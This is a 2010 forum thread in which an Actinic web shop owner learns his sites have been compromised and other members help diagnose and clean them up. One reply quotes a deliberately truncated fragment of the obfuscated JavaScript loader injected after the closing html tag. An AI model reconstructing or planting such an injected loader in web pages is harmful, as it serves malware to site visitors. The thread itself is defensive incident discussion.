Announcement

Collapse
No announcement yet.

mcafee says its 'blocked and removed a trojan' from my site

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    mcafee says its 'blocked and removed a trojan' from my site

    Hi all,

    when I visit my own web site (www.legendgames.co.uk or www.rpgminiatures.co.uk) I get a pop up from Mcaffee telling me its blocked and removed a trojan.

    JS/Iframe.gen.d (trojan) ... can anyone advise - is this just McAfee being paranoid?

    I'm assuming its just actinic code its finding, as I dont think i'm infected by anything here, as i have mcafee running, firewall, nat and dont visit stupid web sites!

    any advice?

    p.s. it doesnt report it on a couple of my other sites.

    andy
    Andy Warner

    www.legendgames.co.uk - rpgs, boardgames, dice and other geeky stuff
    www.RPGMiniatures.com D&D and Star Wars Miniatures

    Both running the Cart from Search Page hack

    Also www.mainlymurder.co.uk www.thegamesplace.co.uk and www.thediceplace.co.uk

    All running V8.5.2 Multisite on a windows 7 quad PC, augmented by Mole End automation, from a single shared database, using actinic specific hosting from Host-IT.

    #2
    I think you may have a problem, at least with legendgames. When I visited I got redirected to a pdf with some wierd stuff on it, then Windows killed my browser session.

    Looking on your source I see there's an odd script after the closing html tag (I removed the middle part to break the script):
    Code:
    <script>/*LGPL*/ try{ window.onload = function(){K7k4bqr2cny = 'h#t!t&(@p@(:$/&^&/(^!h@&@a$^^o@1@^&2^!)3^#-@#&!c!)&o!^&m).)$&t#@#($u@!.!(^t^^)&v)).!p))i^$c)@h(#u^(n$&$&t&#@e@&^^r!$-)c^&&
    
    ....I removed the middle part here....
    
    K7k4bqr2cny);Hfy0ow8p9qp.setAttribute('type', A4e0hnc3yfe);document.body.appendChild(Hfy0ow8p9qp);if (document){Mixz385ns6g8s = Qougyyn7mc;}} }  catch(Euzoqmhltegv2apxp5p3 ) {}</script>
    <!--648df64491841bd39ff59d873b6631b1-->

    Comment


      #3
      There's obviously something there.

      General advice would be to change all FTP passwords, delete and completely refresh the website.
      Someone has got in there somehow (and you want to beat Google to finding/fixing it too or you'll be blacklisted and that takes a while to undo!)
      Tracey

      Comment


        #4
        Kaspersky is reporting it's in actiniccore.js and actinicextras.js - could be others too but I bailed out
        Reusable Snore Earplugs : Sample Earplugs - Wax Earplugs - Women's Earplugs - Children's Earplugs - Music Earplugs - Sleep Masks

        Comment


          #5
          Your other sites eg mainlymurder, games and diceplace are also infected.

          Looks like someone's had a fun time playing on your server - or on your PC.
          Last edited by guccij; 16-Jan-2010, 08:12 PM. Reason: to remove image - not required now
          Reusable Snore Earplugs : Sample Earplugs - Wax Earplugs - Women's Earplugs - Children's Earplugs - Music Earplugs - Sleep Masks

          Comment


            #6
            thanks - looking into it now

            Thanks all,

            looks like ALL index.* files on our entire server (all web sites) have been compromised - not sure how. getting them zapped now, all passwords changed etc.

            thanks again guys.

            andy

            p.s. its only the one web server - our other server is fine, thus its looking like a server breach, not a local infection migrating up to the server via actinic.

            mcaffee doesnt find anything.

            interestingly ALL *.js indx*.* files have been hacked sitewide, in all directories, sub directories etc. so i guess a script run on the server?
            Andy Warner

            www.legendgames.co.uk - rpgs, boardgames, dice and other geeky stuff
            www.RPGMiniatures.com D&D and Star Wars Miniatures

            Both running the Cart from Search Page hack

            Also www.mainlymurder.co.uk www.thegamesplace.co.uk and www.thediceplace.co.uk

            All running V8.5.2 Multisite on a windows 7 quad PC, augmented by Mole End automation, from a single shared database, using actinic specific hosting from Host-IT.

            Comment


              #7
              Originally posted by guccij View Post
              Your other sites eg mainlymurder, games and diceplace are also infected.

              Looks like someone's had a fun time playing on your server - or on your PC.
              Thanks - can you check www.thediceplace.com again please - its on a different server and I didnt get warning wth mcafee like i did on legendgames.

              much appreciated

              I think wear 90% clear now, just mopping up the outliers

              Andy
              Andy Warner

              www.legendgames.co.uk - rpgs, boardgames, dice and other geeky stuff
              www.RPGMiniatures.com D&D and Star Wars Miniatures

              Both running the Cart from Search Page hack

              Also www.mainlymurder.co.uk www.thegamesplace.co.uk and www.thediceplace.co.uk

              All running V8.5.2 Multisite on a windows 7 quad PC, augmented by Mole End automation, from a single shared database, using actinic specific hosting from Host-IT.

              Comment


                #8
                www.thediceplace.com looks fine - so do the others now. Scary few moments, huh?

                Only the index of www.mainlymurder.co.uk is showing but I guess you're still working on that.
                Reusable Snore Earplugs : Sample Earplugs - Wax Earplugs - Women's Earplugs - Children's Earplugs - Music Earplugs - Sleep Masks

                Comment


                  #9
                  oh yes - seems it wasnt only my server hit though, so that makes me feel a bit happier that i wasnt just being stupid with security.
                  gotta tighten up now though.
                  Andy Warner

                  www.legendgames.co.uk - rpgs, boardgames, dice and other geeky stuff
                  www.RPGMiniatures.com D&D and Star Wars Miniatures

                  Both running the Cart from Search Page hack

                  Also www.mainlymurder.co.uk www.thegamesplace.co.uk and www.thediceplace.co.uk

                  All running V8.5.2 Multisite on a windows 7 quad PC, augmented by Mole End automation, from a single shared database, using actinic specific hosting from Host-IT.

                  Comment

                  Working...
                  X